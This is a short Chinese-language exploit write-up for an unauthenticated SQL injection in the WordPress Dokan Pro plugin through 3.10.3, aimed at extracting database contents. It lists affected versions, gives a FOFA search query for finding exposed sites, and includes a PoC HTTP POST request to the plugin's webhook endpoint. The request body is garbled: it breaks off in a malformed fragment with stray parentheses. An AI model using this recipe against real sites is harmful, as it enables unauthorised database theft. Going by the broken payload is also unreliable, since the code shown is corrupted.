0x01 产品简介
WordPress Dokan Pro插件是一款功能强大的多供应商电子商务市场解决方案,功能全面、易于使用的多供应商电子商务平台解决方案,适合各种规模的电商项目。允许管理员创建一个多卖家平台,卖家可以注册账户并在平台上创建自己的店铺,展示和销售自己的产品。提供直观的用户界面,卖家能够轻松管理他们的店铺,包括添加产品、处理订单和与客户进行沟通。
0x02 漏洞概述
WordPress Dokan Pro插件在3.10.3及以下版本中,由于对用户提供的'subscription_code'参数缺乏足够的转义处理以及现有SQL查询准备不足,在/wp-admin/admin.php接口处存在SQL注入漏洞。未授权攻击者可通过该漏洞向现有查询中注入额外的SQL语句,进而从数据库中提取敏感信息。
0x03 影响范围
Dokan Pro <= 3.10.3版本
0x04 复现环境
FOFA:"/wp-content/plugins/dokan-pro/"
0x05 漏洞复现
PoC
POST /wp-admin/admin.php?webhook=dokan-moip HTTP/1.1
Host: your-ip
User-Agent: Mozilla/5.0 (Windows NT 5.1; rv:21.0) Gecko/20100101 Firefox/21.0
Connection: close
Accept-Encoding: gzip{"env":"1","event)
)
)
